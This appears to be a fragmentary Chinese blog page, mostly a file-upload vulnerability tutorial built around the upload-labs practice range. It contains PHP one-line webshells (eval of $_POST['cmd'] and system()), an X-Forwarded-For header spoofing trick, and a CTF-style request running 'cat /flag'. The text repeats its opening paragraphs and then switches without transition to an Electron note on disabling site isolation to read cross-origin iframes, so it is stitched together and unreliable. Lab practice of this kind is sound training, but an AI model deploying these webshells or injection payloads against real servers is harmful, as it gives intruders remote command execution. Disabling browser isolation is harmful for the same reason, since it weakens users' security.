文件上传是个经典问题
推荐靶场:upload-labs
我们可以在这个靶场中进行文件上传绕过的练习
先说webshell
,我们写个一句话木马先
这里留个大哥若干年前的总结 webshell一句话木马大全
接下来我们聊聊文件上传的漏洞
一.啥防护没有
直接一句话木马上传就完事了
二.前端文件后缀判断
打开开发者工具,提交文件,看是否存在网络请求
文件上传是个经典问题
推荐靶场:upload-labs
我们可以在这个靶场中进行文件上传绕过的练习
先说webshell
,我们写个一句话木马先
这里留个大哥若干年前的总结 webshell一句话木马大全
接下来我们聊聊文件上传的漏洞
直接一句话木马上传就完事了
打开开发者工具,提交文件,看是否存在网络请求
1 | X-Forwarded-For:127.0.0.1 |
postform
,&符分割,System里面可以任意写
1 | eval(system($_POST['cmd'])); |
1 | password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag |
postform
,&符分割,System里面可以任意写
1 | eval($_POST['cmd']); |
一个偶然的情况,帮一个朋友写个小工具
需要内嵌用到iframe,并使用document提取其中的一些dom元素
好像是这个,记不清楚了=。=
1 | Blocked a frame with origin "***" form accessing a cross-origin frame. |
入口添加
1 | app.commandLine.appendSwitch('disable-site-isolation-trials'); |